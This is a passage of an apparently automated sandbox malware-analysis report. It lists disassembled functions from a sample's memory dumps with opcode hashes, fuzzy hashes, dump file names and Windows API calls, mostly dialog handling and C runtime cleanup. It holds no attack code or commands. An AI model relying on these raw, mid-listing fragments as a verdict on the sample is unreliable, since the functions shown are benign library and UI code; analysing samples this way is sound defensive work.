                                      • Instruction Fuzzy Hash: 86B14935210A189FD719CF28D48AB667FA0FF56364F258658E89ACF2E1C335ED81CB44
                                      Function 005043BF Relevance: .2, Instructions: 243COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                      • Instruction ID: 2f3db365d7366001111a8c954e9ddab0d3ea2695321d1970a21b03b99942d4f1
                                      • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                      • Instruction Fuzzy Hash: 45813DF13043465BDF24DE68C891BBD3BD4BB94304F040D2EEB8A8B1C2DA7499858B56
                                      Function 005151C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87bfdd2b19d4edf9e3717b34eadecfc7ed688a32f04f1679aeaff8b11782c119
                                      • Instruction ID: e5254b1cbc9837459bcef13bd7c8cb8610b8bb5c3c66769f2b27ca21e57c1681
                                      • Opcode Fuzzy Hash: 87bfdd2b19d4edf9e3717b34eadecfc7ed688a32f04f1679aeaff8b11782c119
                                      • Instruction Fuzzy Hash: 5761583A600F09D6FE345968A899BFE2F94FBC1340F540D1AE563DF281F2B19DC28611
                                      Function 00514F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                      • Instruction ID: 3bb00bf28e72fc3f282b5abe32c161bbeb22813bc97a9b0c2756b051bda9abbc
                                      • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                      • Instruction Fuzzy Hash: 47513425604E45E7FB3545A8845EBFE2F85BBC6300F185819E882DB382F635EEC6C791
                                      Function 04AE606B Relevance: .2, Instructions: 201COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c55a7c7986061739219e6f3b7bc56285a1c51c80d7623f474e1b377a2bd3fc1b
                                      • Instruction ID: d1d994e40e6fbdb415cb118751b7b3f95da269387b7a34dbb53d6970f08d014e
                                      • Opcode Fuzzy Hash: c55a7c7986061739219e6f3b7bc56285a1c51c80d7623f474e1b377a2bd3fc1b
                                      • Instruction Fuzzy Hash: 4E817D76D012698FCB65CF24CD88A9DB7B5FF44750F1446DAE80AA3254EB31AE85CF80
                                      Function 04AE2FBF Relevance: .2, Instructions: 166COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7af6df6ca596eed6cc2f1ded1c31c4de65b79143041e403bbeba28056b12fb69
                                      • Instruction ID: d1803bb12d6cb4fe100153cd8bc5a7936110149f07bfd15aa53defc297335a68
                                      • Opcode Fuzzy Hash: 7af6df6ca596eed6cc2f1ded1c31c4de65b79143041e403bbeba28056b12fb69
                                      • Instruction Fuzzy Hash: 11412E6244E7C18FE7138B708CA46957FB19E5325039E88CBC0E1CF8B3E558995AD362
                                      Function 04AE6390 Relevance: .2, Instructions: 165COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f788f98c43a8250edef7e73017923e591ff3aca5f19730ad30255c6577ba97d1
                                      • Instruction ID: e7d7ea4c88ed4b934410c4f9743fbb88190b80f6b0af986744821935f98ded40
                                      • Opcode Fuzzy Hash: f788f98c43a8250edef7e73017923e591ff3aca5f19730ad30255c6577ba97d1
                                      • Instruction Fuzzy Hash: B2611D76D062658BCF619F28CD88A9EB7B5FF48750F1042D9D81EA3250EB319E85CF50
                                      Function 004FEFE2 Relevance: .2, Instructions: 161COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2f98b8ce58dbfecf7a525dc5bf5ead8c9d031ade68ade164bab42fd7a2463d9
                                      • Instruction ID: 4c9e18d8e24f53729e5d2ac2d5895dcf0a8010e18107c3b00d7b5a1004921d93
                                      • Opcode Fuzzy Hash: d2f98b8ce58dbfecf7a525dc5bf5ead8c9d031ade68ade164bab42fd7a2463d9
                                      • Instruction Fuzzy Hash: 7651E4315083D98FD702CF25C28047EBFE0AE9A714F4909AEE5D95B243C234DA4ECB66
                                      Function 0050F654 Relevance: .1, Instructions: 147COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 85477fced2d564b30b3f85d9129fa633205ba5b2373f9380ce86bfec81801fbb
                                      • Instruction ID: 4906548561abd251363d23ffef61ca89c57d6b48563f11a40202a0d017268e5e
                                      • Opcode Fuzzy Hash: 85477fced2d564b30b3f85d9129fa633205ba5b2373f9380ce86bfec81801fbb
                                      • Instruction Fuzzy Hash: 9A516DB19006198FEB24CF98E9967AEBBF4FB58314F24892AD411EB790D3749905CB50
                                      Function 005000B7 Relevance: .1, Instructions: 141COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5690f047dc85c9c80d8e2fd7c2eef1b13cf1a35c6833466cce78393d23bd1ca9
                                      • Instruction ID: bf6f487791feb75b71c76ffa5da792dc93855bdaedb8946435187792ae3575d6
                                      • Opcode Fuzzy Hash: 5690f047dc85c9c80d8e2fd7c2eef1b13cf1a35c6833466cce78393d23bd1ca9
                                      • Instruction Fuzzy Hash: 1751E0B1A087119FC748CF19D48065AFBE1FF88314F058A2EE899E3341D734EA59CB96
                                      Function 00503E0B Relevance: .1, Instructions: 112COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                      • Instruction ID: c5390f84f50b05a1e94b216f285fd85f003c2b18ad9055e525ec995fbfe83777
                                      • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                      • Instruction Fuzzy Hash: EF31E6B1A147468FCB14DF15C85126EBFE4FB95304F10452DE589C7381C778EA1ACB92
                                      Function 0050C220 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 286windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                        • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0050C2B1
                                      • EndDialog.USER32(?,00000006), ref: 0050C2C4
                                      • GetDlgItem.USER32(?,0000006C), ref: 0050C2E0
                                      • SetFocus.USER32(00000000), ref: 0050C2E7
                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 0050C321
                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0050C358
                                      • _swprintf.LIBCMT ref: 0050C404
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0050C417
                                      • _swprintf.LIBCMT ref: 0050C477
                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 0050C48A
                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0050C4A7
                                      • _swprintf.LIBCMT ref: 0050C535
                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0050C548
                                      • _swprintf.LIBCMT ref: 0050C59C
                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 0050C5AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Item$Text$_swprintf$MessageSend$DialogFocusWindow__vswprintf_c_l
                                      • String ID: %s %s$%s %s %s$PP$REPLACEFILEDLG
                                      • API String ID: 902387417-3764188928
                                      • Opcode ID: 6cfdd7dfed5e7f6a52580d00a35d885c43d4cc5920079db5ae69aae913b752a2
                                      • Instruction ID: 1948fbc7641eabbd82ad39b74760b75b5c767cace3dbe781feb4b6a93cd35fea
                                      • Opcode Fuzzy Hash: 6cfdd7dfed5e7f6a52580d00a35d885c43d4cc5920079db5ae69aae913b752a2
                                      • Instruction Fuzzy Hash: B491A272148349BBE3219BA0CC49FFF7BACFB9A745F004919B789C20C1D775A6089722
                                      Function 004FE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 004FE30E
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      • _strlen.LIBCMT ref: 004FE32F
                                      • SetDlgItemTextW.USER32(?,0052E274,?), ref: 004FE38F
                                      • GetWindowRect.USER32(?,?), ref: 004FE3C9
                                      • GetClientRect.USER32(?,?), ref: 004FE3D5
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004FE475
                                      • GetWindowRect.USER32(?,?), ref: 004FE4A2
                                      • SetWindowTextW.USER32(?,?), ref: 004FE4DB
                                      • GetSystemMetrics.USER32(00000008), ref: 004FE4E3
                                      • GetWindow.USER32(?,00000005), ref: 004FE4EE
                                      • GetWindowRect.USER32(00000000,?), ref: 004FE51B
                                      • GetWindow.USER32(00000000,00000002), ref: 004FE58D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ClientItemLongMetricsSystem__vswprintf_c_l_strlen_swprintf
                                      • String ID: $%s:$CAPTION$d
                                      • API String ID: 1562912926-2512411981
                                      • Opcode ID: eeb42ab69eac7da2857dfa0d38f9c9f0c7e231536d91d7790b4803d49c4608a4
                                      • Instruction ID: b3eb1d78ea6202f8bf80de04b09882b2d3e4045baf302e479de85de36dc92b0c
                                      • Opcode Fuzzy Hash: eeb42ab69eac7da2857dfa0d38f9c9f0c7e231536d91d7790b4803d49c4608a4
                                      • Instruction Fuzzy Hash: 4D818071508305AFD710DFB9CD89A6FBBE9EB89705F04091DFA8497250D634E909CB52
                                      Function 0051CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 0051CB66
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C71E
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C730
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C742
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C754
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C766
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C778
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C78A
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C79C
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7AE
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7C0
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7D2
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7E4
                                        • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7F6
                                      • _free.LIBCMT ref: 0051CB5B
                                        • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,005028B3,00000000,005028B3,00000000,?,0051C8BD,005028B3,00000007,005028B3,?,0051CCBA,005028B3), ref: 00518DE2
                                      • _free.LIBCMT ref: 0051CB7D
                                      • _free.LIBCMT ref: 0051CB92
                                      • _free.LIBCMT ref: 0051CB9D
                                      • _free.LIBCMT ref: 0051CBBF
                                      • _free.LIBCMT ref: 0051CBD2
                                      • _free.LIBCMT ref: 0051CBE0
                                      • _free.LIBCMT ref: 0051CBEB
                                      • _free.LIBCMT ref: 0051CC23
                                      • _free.LIBCMT ref: 0051CC2A
                                      • _free.LIBCMT ref: 0051CC47
                                      • _free.LIBCMT ref: 0051CC5F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free$FreeHeap___free_lconv_mon
                                      • String ID:
                                      • API String ID: 358854727-0
                                      • Opcode ID: 79b5d5f252846e5cc86771986762b0a02dfb3053a1e04693482cbf6a2bd4b028
                                      • Instruction ID: 415bbc1877f1337bff79009da02c1c0f39978b03094ec69a54261b68b17bb876
                                      • Opcode Fuzzy Hash: 79b5d5f252846e5cc86771986762b0a02dfb3053a1e04693482cbf6a2bd4b028
                                      • Instruction Fuzzy Hash: DF313C316443069FFB30AA78E84ABAA7FE9BF50314F505819E158D6191DF36ECC0CA50
                                      Function 0050D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 0050D6C1
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 0050D6ED
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0050D709
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0050D720
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0050D734
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0050D75D
                                      • DeleteObject.GDI32(00000000), ref: 0050D764
                                      • GetWindow.USER32(00000000,00000002), ref: 0050D76D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
